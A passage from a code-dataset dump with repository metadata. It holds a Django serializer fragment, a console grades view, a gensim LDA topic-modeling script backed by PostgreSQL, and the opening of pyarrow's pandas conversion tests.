serializer.validated_data['pid'] = self.request.META.get('urcpid', None)
serializer.validated_data['uid'] = self.request.META.get('gpduid', None)
serializer.save()
| 34.75
| 124
| 0.698741
|
4a07c4272d7ad81095e001f791aad691676c7796
| 708
|
py
|
Python
|
views/grades.py
|
MatthewKosloski/student-information-system
|
a3469647298d62c45c793e70a3ac70c0524340e2
|
[
"CECILL-B"
] | null | null | null |
views/grades.py
|
MatthewKosloski/student-information-system
|
a3469647298d62c45c793e70a3ac70c0524340e2
|
[
"CECILL-B"
] | null | null | null |
views/grades.py
|
MatthewKosloski/student-information-system
|
a3469647298d62c45c793e70a3ac70c0524340e2
|
[
"CECILL-B"
] | null | null | null |
from .base import BaseView
from table import Table
class GradesView(BaseView):
def __init__(self, controller):
super().__init__(controller)
self.set_choices([
'Back'
])
'''
Creates a table listing the student's
grades for each section.
@param grades {list}
@return Table
'''
def get_grades_table(self, grades):
table = Table(['COURSE', 'GRADE', 'PERCENT'])
for item in grades:
table.add_row([
item['course'],
item['grade'],
item['percent']
])
return table
def render(self, payload):
self.print_title(payload['view_title'])
print(self.get_grades_table(payload['grades']))
print()
print(self.get_choices_list())
print()
self.choice_prompt()
| 17.7
| 49
| 0.672316
|
4a07c63add5abc7ad9451d054d9385cd5e5d4161
| 7,694
|
py
|
Python
|
yanrin/topic_modeling.py
|
jaideep2/yanrin
|
ba34f7f1c9d7f43f4800ea5cc25a333553ce9186
|
[
"Apache-2.0"
] | null | null | null |
yanrin/topic_modeling.py
|
jaideep2/yanrin
|
ba34f7f1c9d7f43f4800ea5cc25a333553ce9186
|
[
"Apache-2.0"
] | null | null | null |
yanrin/topic_modeling.py
|
jaideep2/yanrin
|
ba34f7f1c9d7f43f4800ea5cc25a333553ce9186
|
[
"Apache-2.0"
] | null | null | null |
import gensim
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from gensim.corpora import Dictionary
from gensim.models import CoherenceModel, LdaModel, TfidfModel
import operator
import psycopg2
from sql.statements import create_new_record, update_news_id, find_record
from utils.helper import get_datequery
doc2id_mapping = {}
def get_doc(date):
doc = []
try:
conn = psycopg2.connect("dbname=jaideepsingh user=jaideepsingh")
cur = conn.cursor()
cur.execute('''select id,content from news where ''' + get_datequery(date))
rows = cur.fetchall()
for i,row in enumerate(rows):
doc2id_mapping[i] = row[0]
doc.append(row[1])
conn.commit()
cur.close()
conn.close()
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if conn is not None:
conn.close()
return doc
def build_texts(doc):
for d in doc: yield gensim.utils.simple_preprocess(d, deacc=True, min_len=3)
def process_doc(doc):
train_texts = list(build_texts(doc))
print('train len:', len(train_texts))
bigram = gensim.models.Phrases(train_texts, min_count=10) # for bigram collocation detection
stops = set(stopwords.words('english')) # nltk stopwords list
#Stopword Removal.
texts = [[word for word in line if word not in stops] for line in train_texts]
#Collocation detection.
texts = [bigram[line] for line in texts]
# Remove numbers, but not words that contain numbers.
texts = [[token for token in line if not token.isnumeric()] for line in texts]
# Remove words that are only two or less characters.
texts = [[token for token in line if len(token) > 2] for line in texts]
#Lemmatization (not stem since stemming can reduce the interpretability).
lemmatizer = WordNetLemmatizer()
texts = [[word for word in lemmatizer.lemmatize(' '.join(line), pos='v').split()] for line in texts]
return texts
def ret_top_model(corpus, dictionary, train_texts, num_times):
"""
Since LDAmodel is a probabilistic model, it comes up different topics each time we run it. To control the
quality of the topic model we produce, we can see what the interpretability of the best topic is and keep
evaluating the topic model until a certian threshold is crossed.
Returns:
-------
lm: Final evaluated topic model
top_topics: ranked topics in decreasing order. List of tuples
"""
top_topics = [(0, 0)]
rounds = 1
high = 0.0
out_lm = None
print('dict size:',len(dictionary))
num_topics = int(len(dictionary)*0.1) #10% of all dictionary
print('num_topics:',num_topics)
while True:
lm = LdaModel(corpus=corpus, num_topics=num_topics, id2word=dictionary, minimum_probability=0)
coherence_values = {}
for n, topic in lm.show_topics(num_topics=-1, formatted=False):
topic = [word for word, _ in topic]
cm = CoherenceModel(topics=[topic], texts=train_texts, dictionary=dictionary, window_size=10)
coherence_values[n] = cm.get_coherence()
top_topics = sorted(coherence_values.items(), key=operator.itemgetter(1), reverse=True)
if high < top_topics[0][1]:
high = top_topics[0][1]
out_lm = lm
print('round ',rounds,':',top_topics[0][1])
if rounds > num_times-1:
break
rounds+=1
return out_lm, top_topics, high
def get_doc_topics(doc,lm,dictionary,doc_id):
print('getting topics for doc',doc_id)
topic_distribution = lm.get_document_topics(dictionary.doc2bow(doc[doc_id].split()), minimum_probability=0.6)
topic_distribution = sorted(topic_distribution, key=lambda x: float(x[1]), reverse=True)
topics = []
for t, f in topic_distribution:
print('Prob:',t,f)
for word, prob in lm.show_topic(t):
topics.append(word)
return topics
def create_dates(year):
from datetime import date,timedelta
start = date(year,1,1)
dates = []
while start.year == year and start.month == 1:
start += timedelta(days=1)
dates.append(start)
return dates
def process_dict(train_texts, doc_len):
dictionary = Dictionary(train_texts)
print('dict size:', len(dictionary))
# remove extremes
no_below = int(doc_len * 0.008)
filter_freq = int(doc_len * 0.2)
print('no_below,filter_freq:', no_below, filter_freq)
dictionary.filter_extremes(no_below=no_below) # remove words in less 0.8% of documents
dictionary.filter_n_most_frequent(filter_freq) # Filter out 20% of most common word tokens
# filter_tokens(bad_ids=None, good_ids=None)
return dictionary
def insert_new_row(cur, topic_name, date, news_id):
cur.execute(create_new_record,
{'name': topic_name, 'type': 'All', 'startdate': date, 'enddate': date, 'news_ids': '{%s}' % news_id})
print('new row done')
def update_row(cur, topic_name, date, news_id, row_id):
cur.execute(update_news_id, {'news_ids': '%s' % news_id, 'id' : row_id})
print('rows updated')
def find_relevant_rows(cur, topic_name, date):
cur.execute(find_record, {'name': topic_name, 'date': date})
return cur.fetchall()
def insert_into_relevant_topic(cur, topic_name, news_id, date):
rows = find_relevant_rows(cur, topic_name, date)
print('insert_into_relevant_topic rows:',rows)
if not rows:
# if topic name doesnt exist for current date insert new topic with news_ids = 0 and given date
print('insert_new_row')
insert_new_row(cur, topic_name, date, news_id)
else:
# if topic exists append news_id to said topic
print('update_row')
update_row(cur, topic_name, date, news_id, rows[0][0])
def main():
'''
0. decide what date or range of dates to run this on
1. create dictionary and corpus
2. create model
3. for each doc get top topic
4. insert topic into topic table with date
:return:
'''
datez = create_dates(2016)
doc = []
for date in datez:
doc.extend(get_doc(date))
doc_len = len(doc)
train_texts = process_doc(doc)
dictionary = process_dict(train_texts,doc_len)
corpus = [dictionary.doc2bow(text) for text in train_texts]
print('doc_len:',doc_len)
print('corpus size:',len(corpus))
print('lda+lsi model start!')
num_times = 1
lm, top_topics, high = ret_top_model(corpus,dictionary,train_texts,num_times)
save_model = True
load_model = False
if save_model:
lm.save('/Users/jaideepsingh/Projects/yanrin/lm2016Jan.ldamodel')
if load_model:
lm = LdaModel.load('/Users/jaideepsingh/Projects/yanrin/lm2016Jan.ldamodel')
print('finished!')
try:
conn = psycopg2.connect("dbname=jaideepsingh user=jaideepsingh")
cur = conn.cursor()
for doc_id in range(doc_len):
topics = get_doc_topics(doc, lm, dictionary, doc_id)
print(topics)
print('docid:',doc_id)
print('mapping:',doc2id_mapping[doc_id])
news_id = doc2id_mapping[doc_id]
print('news_id:',news_id)
if topics:
for topic_name in topics:
print('Putting topic',topic_name,'into topics table')
insert_into_relevant_topic(cur, topic_name, news_id, date)
conn.commit()
cur.close()
conn.close()
print('db closed')
except (Exception, psycopg2.DatabaseError) as error:
print(error)
finally:
if conn is not None:
conn.close()
if __name__ == '__main__':
main()
| 37.169082
| 118
| 0.661944
|
4a07c6f5fda6ab717d55307d3d3c68b196c81732
| 123,870
|
py
|
Python
|
python/pyarrow/tests/test_pandas.py
|
jsternberg/arrow
|
a241cf60d1a5d485a95dfe95bbdc5bdcaadfd213
|
[
"Apache-2.0"
] | null | null | null |
python/pyarrow/tests/test_pandas.py
|
jsternberg/arrow
|
a241cf60d1a5d485a95dfe95bbdc5bdcaadfd213
|
[
"Apache-2.0"
] | null | null | null |
python/pyarrow/tests/test_pandas.py
|
jsternberg/arrow
|
a241cf60d1a5d485a95dfe95bbdc5bdcaadfd213
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import gc
import six
import decimal
import json
import multiprocessing as mp
import sys
from collections import OrderedDict
from datetime import date, datetime, time, timedelta
from distutils.version import LooseVersion
import hypothesis as h
import hypothesis.extra.pytz as tzst
import hypothesis.strategies as st
import numpy as np
import numpy.testing as npt
import pytest
import pytz
from pyarrow.pandas_compat import get_logical_type, _pandas_api
from pyarrow.tests.util import random_ascii
import pyarrow as pa
try:
import pandas as pd
import pandas.util.testing as tm
from .pandas_examples import dataframe_with_arrays, dataframe_with_lists
except ImportError:
pass
# Marks all of the tests in this module
pytestmark = pytest.mark.pandas
def _alltypes_example(size=100):
return pd.DataFrame({
'uint8': np.arange(size, dtype=np.uint8),
'uint16': np.arange(size, dtype=np.uint16),
'uint32': np.arange(size, dtype=np.uint32),
'uint64': np.arange(size, dtype=np.uint64),
'int8': np.arange(size, dtype=np.int16),
'int16': np.arange(size, dtype=np.int16),
'int32': np.arange(size, dtype=np.int32),
'int64': np.arange(size, dtype=np.int64),
'float32': np.arange(size, dtype=np.float32),
'float64': np.arange(size, dtype=np.float64),
'bool': np.random.randn(size) > 0,
# TODO(wesm): Pandas only support ns resolution, Arrow supports s, ms,
# us, ns
'datetime': np.arange("2016-01-01T00:00:00.001", size,
dtype='datetime64[ms]'),
'str': [str(x) for x in range(size)],
'str_with_nulls': [None] + [str(x) for x in range(size - 2)] + [None],
'empty_str': [''] * size
})
def _check_pandas_roundtrip(df, expected=None, use_threads=True,
expected_schema=None,
check_dtype=True, schema=None,
preserve_index=False,
as_batch=False):
klass = pa.RecordBatch if as_batch else pa.Table
table = klass.from_pandas(df, schema=schema,
preserve_index=preserve_index,
nthreads=2 if use_threads else 1)
result = table.to_pandas(use_threads=use_threads)
if expected_schema:
# all occurences of _check_pandas_roundtrip passes expected_schema
# without the pandas generated key-value metadata
assert table.schema.equals(expected_schema, check_metadata=False)
if expected is None:
expected = df
tm.assert_frame_equal(result, expected, check_dtype=check_dtype,
check_index_type=('equiv' if preserve_index
else False))
def _check_series_roundtrip(s, type_=None, expected_pa_type=None):
arr = pa.array(s, from_pandas=True, type=type_)
if type_ is not None and expected_pa_type is None:
expected_pa_type = type_
if expected_pa_type is not None:
assert arr.type == expected_pa_type
result = pd.Series(arr.to_pandas(), name=s.name)
tm.assert_series_equal(s, result)
def _check_array_roundtrip(values, expected=None, mask=None,
type=None):
arr = pa.array(values, from_pandas=True, mask=mask, type=type)
result = arr.to_pandas()
values_nulls = pd.isnull(values)
if mask is None:
assert arr.null_count == values_nulls.sum()
else:
assert arr.null_count == (mask | values_nulls).sum()
if expected is None:
if mask is None:
expected = pd.Series(values)
else:
expected = pd.Series(np.ma.masked_array(values, mask=mask))
tm.assert_series_equal(pd.Series(result), expected, check_names=False)
def _check_array_from_pandas_roundtrip(np_array, type=None):
arr = pa.array(np_array, from_pandas=True, type=type)
result = arr.to_pandas()
npt.assert_array_equal(result, np_array)
class TestConvertMetadata(object):
"""
Conversion tests for Pandas metadata & indices.
"""
def test_non_string_columns(self):
df = pd.DataFrame({0: [1, 2, 3]})
table = pa.Table.from_pandas(df)
assert table.field(0).name == '0'
def test_from_pandas_with_columns(self):
df = pd.DataFrame({0: [1, 2, 3], 1: [1, 3, 3], 2: [2, 4, 5]},
columns=[1, 0])
table = pa.Table.from_pandas(df, columns=[0, 1])
expected = pa.Table.from_pandas(df[[0, 1]])
assert expected.equals(table)
record_batch_table = pa.RecordBatch.from_pandas(df, columns=[0, 1])
record_batch_expected = pa.RecordBatch.from_pandas(df[[0, 1]])
assert record_batch_expected.equals(record_batch_table)
def test_column_index_names_are_preserved(self):
df = pd.DataFrame({'data': [1, 2, 3]})
df.columns.names = ['a']
_check_pandas_roundtrip(df, preserve_index=True)
def test_range_index_shortcut(self):
# ARROW-1639
index_name = 'foo'
df = pd.DataFrame({'a': [1, 2, 3, 4]},
index=pd.RangeIndex(0, 8, step=2, name=index_name))
df2 = pd.DataFrame({'a': [4, 5, 6, 7]},
index=pd.RangeIndex(0, 4))
table = pa.Table.from_pandas(df)
table_no_index_name = pa.Table.from_pandas(df2)
# The RangeIndex is tracked in the metadata only
assert len(table.schema) == 1
result = table.to_pandas()
tm.assert_frame_equal(result, df)
assert isinstance(result.index, pd.RangeIndex)
assert _pandas_api.get_rangeindex_attribute(result.index, 'step') == 2
assert result.index.name == index_name
result2 = table_no_index_name.to_pandas()
tm.assert_frame_equal(result2, df2)
assert isinstance(result2.index, pd.RangeIndex)
assert _pandas_api.get_rangeindex_attribute(result2.index, 'step') == 1
assert result2.index.name is None
def test_range_index_force_serialization(self):
# ARROW-5427: preserve_index=True will force the RangeIndex to
# be serialized as a column rather than tracked more
# efficiently as metadata
df = pd.DataFrame({'a': [1, 2, 3, 4]},
index=pd.RangeIndex(0, 8, step=2, name='foo'))
table = pa.Table.from_pandas(df, preserve_index=True)
assert table.num_columns == 2
assert 'foo' in table.column_names
restored = table.to_pandas()
tm.assert_frame_equal(restored, df)
def test_rangeindex_doesnt_warn(self):
# ARROW-5606: pandas 0.25 deprecated private _start/stop/step
# attributes -> can be removed if support < pd 0.25 is dropped
df = pd.DataFrame(np.random.randn(4, 2), columns=['a', 'b'])
with pytest.warns(None) as record:
_check_pandas_roundtrip(df, preserve_index=True)
assert len(record) == 0
def test_multiindex_columns(self):
columns = pd.MultiIndex.from_arrays([
['one', 'two'], ['X', 'Y']
])
df = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')], columns=columns)
_check_pandas_roundtrip(df, preserve_index=True)
def test_multiindex_columns_with_dtypes(self):
    """MultiIndex columns mixing string and datetime levels round-trip."""
    columns = pd.MultiIndex.from_arrays(
        [
            ['one', 'two'],
            pd.DatetimeIndex(['2017-08-01', '2017-08-02']),
        ],
        names=['level_1', 'level_2'],
    )
    df = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')], columns=columns)
    _check_pandas_roundtrip(df, preserve_index=True)
def test_multiindex_with_datetimes(self):
    """Object-dtype datetime column labels come back as datetime64[ns]."""
    # ARROW-3651. This bug occurred only when the dtype of the columns is
    # object. It does not occur for datetime64[ns]
    df = pd.DataFrame(1, index=pd.Index(list(range(5)), name='index'),
                      columns=pd.Index([datetime(2018, 1, 1)], dtype='O'))
    assert df.columns.dtype == 'object'
    reconstructed = pa.table(df).to_pandas()
    # The reconstruction process results in object->datetime64[ns]
    df_expected = df.copy()
    df_expected.columns = df.columns.values
    assert df_expected.columns.dtype == 'datetime64[ns]'
    tm.assert_frame_equal(df_expected, reconstructed)
def test_multiindex_columns_unicode(self):
    """MultiIndex column labels containing non-ASCII text round-trip."""
    cols = pd.MultiIndex.from_arrays([[u'あ', u'い'], ['X', 'Y']])
    frame = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')], columns=cols)
    _check_pandas_roundtrip(frame, preserve_index=True)
def test_multiindex_doesnt_warn(self):
    """Round-tripping MultiIndex columns emits no warnings."""
    # ARROW-3953: pandas 0.24 rename of MultiIndex labels to codes
    columns = pd.MultiIndex.from_arrays([['one', 'two'], ['X', 'Y']])
    df = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')], columns=columns)
    with pytest.warns(None) as record:
        _check_pandas_roundtrip(df, preserve_index=True)
    assert len(record) == 0
def test_integer_index_column(self):
    """Default integer column labels are preserved on round trip."""
    frame = pd.DataFrame([(1, 'a'), (2, 'b'), (3, 'c')])
    _check_pandas_roundtrip(frame, preserve_index=True)
def test_index_metadata_field_name(self):
    """Index levels and oddly-named columns get distinct field names."""
    # test None case, and strangely named non-index columns
    df = pd.DataFrame(
        [(1, 'a', 3.1), (2, 'b', 2.2), (3, 'c', 1.3)],
        index=pd.MultiIndex.from_arrays(
            [['c', 'b', 'a'], [3, 2, 1]],
            names=[None, 'foo']
        ),
        columns=['a', None, '__index_level_0__'],
    )
    # duplicate-looking names trigger a UserWarning on conversion
    with pytest.warns(UserWarning):
        t = pa.Table.from_pandas(df, preserve_index=True)
    js = t.schema.pandas_metadata
    col1, col2, col3, idx0, foo = js['columns']
    assert col1['name'] == 'a'
    assert col1['name'] == col1['field_name']
    # a None column label is serialized under the string 'None'
    assert col2['name'] is None
    assert col2['field_name'] == 'None'
    assert col3['name'] == '__index_level_0__'
    assert col3['name'] == col3['field_name']
    idx0_descr, foo_descr = js['index_columns']
    assert idx0_descr == '__index_level_0__'
    assert idx0['field_name'] == idx0_descr
    assert idx0['name'] is None
    assert foo_descr == 'foo'
    assert foo['field_name'] == foo_descr
    assert foo['name'] == foo_descr
def test_categorical_column_index(self):
    """A categorical column index is described as such in the metadata."""
    df = pd.DataFrame(
        [(1, 'a', 2.0), (2, 'b', 3.0), (3, 'c', 4.0)],
        columns=pd.Index(list('def'), dtype='category')
    )
    t = pa.Table.from_pandas(df, preserve_index=True)
    js = t.schema.pandas_metadata
    column_indexes, = js['column_indexes']
    assert column_indexes['name'] is None
    assert column_indexes['pandas_type'] == 'categorical'
    # 3 categories fit into int8 codes
    assert column_indexes['numpy_type'] == 'int8'
    md = column_indexes['metadata']
    assert md['num_categories'] == 3
    assert md['ordered'] is False
def test_string_column_index(self):
    """String column index name, type and encoding appear in the metadata."""
    df = pd.DataFrame(
        [(1, 'a', 2.0), (2, 'b', 3.0), (3, 'c', 4.0)],
        columns=pd.Index(list('def'), name='stringz')
    )
    t = pa.Table.from_pandas(df, preserve_index=True)
    js = t.schema.pandas_metadata
    column_indexes, = js['column_indexes']
    assert column_indexes['name'] == 'stringz'
    assert column_indexes['name'] == column_indexes['field_name']
    assert column_indexes['numpy_type'] == 'object'
    # Python 2 str is bytes; Python 3 str is unicode
    assert column_indexes['pandas_type'] == (
        'bytes' if six.PY2 else 'unicode'
    )
    md = column_indexes['metadata']
    if not six.PY2:
        assert len(md) == 1
        assert md['encoding'] == 'UTF-8'
    else:
        assert md is None or 'encoding' not in md
def test_datetimetz_column_index(self):
    """A tz-aware datetime column index records its timezone in metadata."""
    df = pd.DataFrame(
        [(1, 'a', 2.0), (2, 'b', 3.0), (3, 'c', 4.0)],
        columns=pd.date_range(
            start='2017-01-01', periods=3, tz='America/New_York'
        )
    )
    t = pa.Table.from_pandas(df, preserve_index=True)
    js = t.schema.pandas_metadata
    column_indexes, = js['column_indexes']
    assert column_indexes['name'] is None
    assert column_indexes['pandas_type'] == 'datetimetz'
    assert column_indexes['numpy_type'] == 'datetime64[ns]'
    md = column_indexes['metadata']
    assert md['timezone'] == 'America/New_York'
def test_datetimetz_row_index(self):
    """A timezone-aware datetime row index survives the round trip."""
    stamps = pd.date_range(
        start='2017-01-01', periods=3, tz='America/New_York'
    )
    frame = pd.DataFrame({'a': stamps}).set_index('a')
    _check_pandas_roundtrip(frame, preserve_index=True)
def test_categorical_row_index(self):
    """A categorical row index survives the round trip."""
    frame = pd.DataFrame({'a': [1, 2, 3], 'b': [1, 2, 3]})
    frame['a'] = frame['a'].astype('category')
    _check_pandas_roundtrip(frame.set_index('a'), preserve_index=True)
def test_duplicate_column_names_does_not_crash(self):
    """Duplicate column names raise ValueError instead of crashing."""
    frame = pd.DataFrame([(1, 'a'), (2, 'b')], columns=['a', 'a'])
    with pytest.raises(ValueError):
        pa.Table.from_pandas(frame)
def test_dictionary_indices_boundscheck(self):
    """Out-of-bounds dictionary indices raise instead of segfaulting."""
    # ARROW-1658. No validation of indices leads to segfaults in pandas
    indices = [[0, 1], [0, -1]]
    for inds in indices:
        # safe=False skips validation at construction time
        arr = pa.DictionaryArray.from_arrays(inds, ['a'], safe=False)
        batch = pa.RecordBatch.from_arrays([arr], ['foo'])
        table = pa.Table.from_batches([batch, batch, batch])
        with pytest.raises(pa.ArrowInvalid):
            arr.to_pandas()
        with pytest.raises(pa.ArrowInvalid):
            table.to_pandas()
def test_unicode_with_unicode_column_and_index(self):
    """Non-ASCII data, column name and index label all round-trip."""
    frame = pd.DataFrame({u'あ': [u'い']}, index=[u'う'])
    _check_pandas_roundtrip(frame, preserve_index=True)
def test_mixed_column_names(self):
    """Mixed-type column labels warn and are coerced to text."""
    # mixed type column names are not reconstructed exactly
    df = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
    for cols in [[u'あ', b'a'], [1, '2'], [1, 1.5]]:
        df.columns = pd.Index(cols, dtype=object)
        # assert that the from_pandas raises the warning
        with pytest.warns(UserWarning):
            pa.Table.from_pandas(df)
        # labels come back stringified
        expected = df.copy()
        expected.columns = df.columns.astype(six.text_type)
        with pytest.warns(UserWarning):
            _check_pandas_roundtrip(df, expected=expected,
                                    preserve_index=True)
def test_binary_column_name(self):
    """A bytes column name round-trips via UTF-8 decoding."""
    column_data = [u'い']
    key = u'あ'.encode('utf8')
    data = {key: column_data}
    df = pd.DataFrame(data)
    # we can't use _check_pandas_roundtrip here because our metadata
    # is always decoded as utf8: even if binary goes in, utf8 comes out
    t = pa.Table.from_pandas(df, preserve_index=True)
    df2 = t.to_pandas()
    assert df.values[0] == df2.values[0]
    assert df.index.values[0] == df2.index.values[0]
    assert df.columns[0] == key
def test_multiindex_duplicate_values(self):
    """A MultiIndex with repeated labels round-trips unchanged."""
    numbers = [0, 1, 2]
    index = pd.MultiIndex.from_arrays(
        [['foo', 'foo', 'bar'], numbers],
        names=['foobar', 'some_numbers'],
    )
    frame = pd.DataFrame({'numbers': numbers}, index=index)
    roundtripped = pa.Table.from_pandas(frame).to_pandas()
    tm.assert_frame_equal(roundtripped, frame)
def test_metadata_with_mixed_types(self):
    """Mixed bytes/unicode data is reported as 'bytes', never 'mixed'."""
    df = pd.DataFrame({'data': [b'some_bytes', u'some_unicode']})
    table = pa.Table.from_pandas(df)
    js = table.schema.pandas_metadata
    assert 'mixed' not in js
    data_column = js['columns'][0]
    assert data_column['pandas_type'] == 'bytes'
    assert data_column['numpy_type'] == 'object'
def test_ignore_metadata(self):
    """ignore_metadata=True matches converting a metadata-stripped table."""
    df = pd.DataFrame({'a': [1, 2, 3], 'b': ['foo', 'bar', 'baz']},
                      index=['one', 'two', 'three'])
    table = pa.Table.from_pandas(df)
    result = table.to_pandas(ignore_metadata=True)
    expected = (table.cast(table.schema.remove_metadata())
                .to_pandas())
    assert result.equals(expected)
def test_list_metadata(self):
    """List columns are reported as 'list[int64]' in the pandas metadata."""
    df = pd.DataFrame({'data': [[1], [2, 3, 4], [5] * 7]})
    schema = pa.schema([pa.field('data', type=pa.list_(pa.int64()))])
    table = pa.Table.from_pandas(df, schema=schema)
    js = table.schema.pandas_metadata
    assert 'mixed' not in js
    data_column = js['columns'][0]
    assert data_column['pandas_type'] == 'list[int64]'
    assert data_column['numpy_type'] == 'object'
def test_struct_metadata(self):
    """Struct-typed columns report pandas_type 'object' in the metadata."""
    frame = pd.DataFrame({'dicts': [{'a': 1, 'b': 2}, {'a': 3, 'b': 4}]})
    metadata = pa.Table.from_pandas(frame).schema.pandas_metadata
    assert metadata['columns'][0]['pandas_type'] == 'object'
def test_decimal_metadata(self):
    """Decimal columns record precision and scale in the metadata."""
    expected = pd.DataFrame({
        'decimals': [
            decimal.Decimal('394092382910493.12341234678'),
            -decimal.Decimal('314292388910493.12343437128'),
        ]
    })
    table = pa.Table.from_pandas(expected)
    js = table.schema.pandas_metadata
    assert 'mixed' not in js
    data_column = js['columns'][0]
    assert data_column['pandas_type'] == 'decimal'
    assert data_column['numpy_type'] == 'object'
    # 26 total digits, 11 after the decimal point
    assert data_column['metadata'] == {'precision': 26, 'scale': 11}
def test_table_column_subset_metadata(self):
    """Index metadata stays consistent after removing table columns."""
    # ARROW-1883
    # non-default index
    for index in [
            pd.Index(['a', 'b', 'c'], name='index'),
            pd.date_range("2017-01-01", periods=3, tz='Europe/Brussels')]:
        df = pd.DataFrame({'a': [1, 2, 3],
                           'b': [.1, .2, .3]}, index=index)
        table = pa.Table.from_pandas(df)
        table_subset = table.remove_column(1)
        result = table_subset.to_pandas()
        tm.assert_frame_equal(result, df[['a']])
        # removing the serialized index column as well drops the
        # custom index, leaving a default RangeIndex
        table_subset2 = table_subset.remove_column(1)
        result = table_subset2.to_pandas()
        tm.assert_frame_equal(result, df[['a']].reset_index(drop=True))
def test_empty_list_metadata(self):
    """All-empty list columns degrade to 'list[empty]' after a round trip."""
    # Create table with array of empty lists, forced to have type
    # list(string) in pyarrow
    c1 = [["test"], ["a", "b"], None]
    c2 = [[], [], []]
    arrays = OrderedDict([
        ('c1', pa.array(c1, type=pa.list_(pa.string()))),
        ('c2', pa.array(c2, type=pa.list_(pa.string()))),
    ])
    rb = pa.RecordBatch.from_arrays(
        list(arrays.values()),
        list(arrays.keys())
    )
    tbl = pa.Table.from_batches([rb])
    # First roundtrip changes schema, because pandas cannot preserve the
    # type of empty lists
    df = tbl.to_pandas()
    tbl2 = pa.Table.from_pandas(df)
    md2 = tbl2.schema.pandas_metadata
    # Second roundtrip
    df2 = tbl2.to_pandas()
    expected = pd.DataFrame(OrderedDict([('c1', c1), ('c2', c2)]))
    tm.assert_frame_equal(df2, expected)
    assert md2['columns'] == [
        {
            'name': 'c1',
            'field_name': 'c1',
            'metadata': None,
            'numpy_type': 'object',
            'pandas_type': 'list[unicode]',
        },
        {
            'name': 'c2',
            'field_name': 'c2',
            'metadata': None,
            'numpy_type': 'object',
            'pandas_type': 'list[empty]',
        }
    ]
def test_metadata_pandas_version(self):
    """The serialized metadata records the pandas version used."""
    frame = pd.DataFrame({'a': [1, 2, 3], 'b': [1, 2, 3]})
    meta = pa.Table.from_pandas(frame).schema.pandas_metadata
    assert meta['pandas_version'] is not None
class TestConvertPrimitiveTypes(object):
    """
    Conversion tests for primitive (e.g. numeric) types.
    """

    def test_float_no_nulls(self):
        """Float16/32/64 columns without nulls round-trip with exact schema."""
        data = {}
        fields = []
        dtypes = [('f2', pa.float16()),
                  ('f4', pa.float32()),
                  ('f8', pa.float64())]
        num_values = 100
        for numpy_dtype, arrow_dtype in dtypes:
            values = np.random.randn(num_values)
            data[numpy_dtype] = values.astype(numpy_dtype)
            fields.append(pa.field(numpy_dtype, arrow_dtype))
        df = pd.DataFrame(data)
        schema = pa.schema(fields)
        _check_pandas_roundtrip(df, expected_schema=schema)

    def test_float_nulls(self):
        """Masked float values come back as NaN in pandas."""
        num_values = 100
        null_mask = np.random.randint(0, 10, size=num_values) < 3
        dtypes = [('f2', pa.float16()),
                  ('f4', pa.float32()),
                  ('f8', pa.float64())]
        names = ['f2', 'f4', 'f8']
        expected_cols = []
        arrays = []
        fields = []
        for name, arrow_dtype in dtypes:
            values = np.random.randn(num_values).astype(name)
            arr = pa.array(values, from_pandas=True, mask=null_mask)
            arrays.append(arr)
            fields.append(pa.field(name, arrow_dtype))
            # expected output: nulls surface as NaN
            values[null_mask] = np.nan
            expected_cols.append(values)
        ex_frame = pd.DataFrame(dict(zip(names, expected_cols)),
                                columns=names)
        table = pa.Table.from_arrays(arrays, names)
        assert table.schema.equals(pa.schema(fields))
        result = table.to_pandas()
        tm.assert_frame_equal(result, ex_frame)

    def test_float_nulls_to_ints(self):
        """Floats with nulls can be cast to a nullable integer column."""
        # ARROW-2135
        # NOTE: was pd.np.NaN -- the pandas.np alias is deprecated/removed,
        # np.nan is the same object
        df = pd.DataFrame({"a": [1.0, 2.0, np.nan]})
        schema = pa.schema([pa.field("a", pa.int16(), nullable=True)])
        table = pa.Table.from_pandas(df, schema=schema, safe=False)
        assert table[0].to_pylist() == [1, 2, None]
        tm.assert_frame_equal(df, table.to_pandas())

    def test_float_nulls_to_boolean(self):
        """Floats with a None convert to a nullable boolean array."""
        s = pd.Series([0.0, 1.0, 2.0, None, -3.0])
        expected = pd.Series([False, True, True, None, True])
        _check_array_roundtrip(s, expected=expected, type=pa.bool_())

    def test_series_from_pandas_false_respected(self):
        """from_pandas=False keeps NaN as a value instead of a null."""
        # Check that explicit from_pandas=False is respected
        s = pd.Series([0.0, np.nan])
        arr = pa.array(s, from_pandas=False)
        assert arr.null_count == 0
        assert np.isnan(arr[1].as_py())

    def test_integer_no_nulls(self):
        """All integer widths without nulls round-trip with exact schema."""
        data = OrderedDict()
        fields = []
        numpy_dtypes = [
            ('i1', pa.int8()), ('i2', pa.int16()),
            ('i4', pa.int32()), ('i8', pa.int64()),
            ('u1', pa.uint8()), ('u2', pa.uint16()),
            ('u4', pa.uint32()), ('u8', pa.uint64()),
            ('longlong', pa.int64()), ('ulonglong', pa.uint64())
        ]
        num_values = 100
        for dtype, arrow_dtype in numpy_dtypes:
            info = np.iinfo(dtype)
            # clamp to the platform int range accepted by np.random.randint
            values = np.random.randint(max(info.min, np.iinfo(np.int_).min),
                                       min(info.max, np.iinfo(np.int_).max),
                                       size=num_values)
            data[dtype] = values.astype(dtype)
            fields.append(pa.field(dtype, arrow_dtype))
        df = pd.DataFrame(data)
        schema = pa.schema(fields)
        _check_pandas_roundtrip(df, expected_schema=schema)

    def test_all_integer_types(self):
        """Every NumPy integer alias converts via Table and via pa.array."""
        # Test all Numpy integer aliases
        data = OrderedDict()
        numpy_dtypes = ['i1', 'i2', 'i4', 'i8', 'u1', 'u2', 'u4', 'u8',
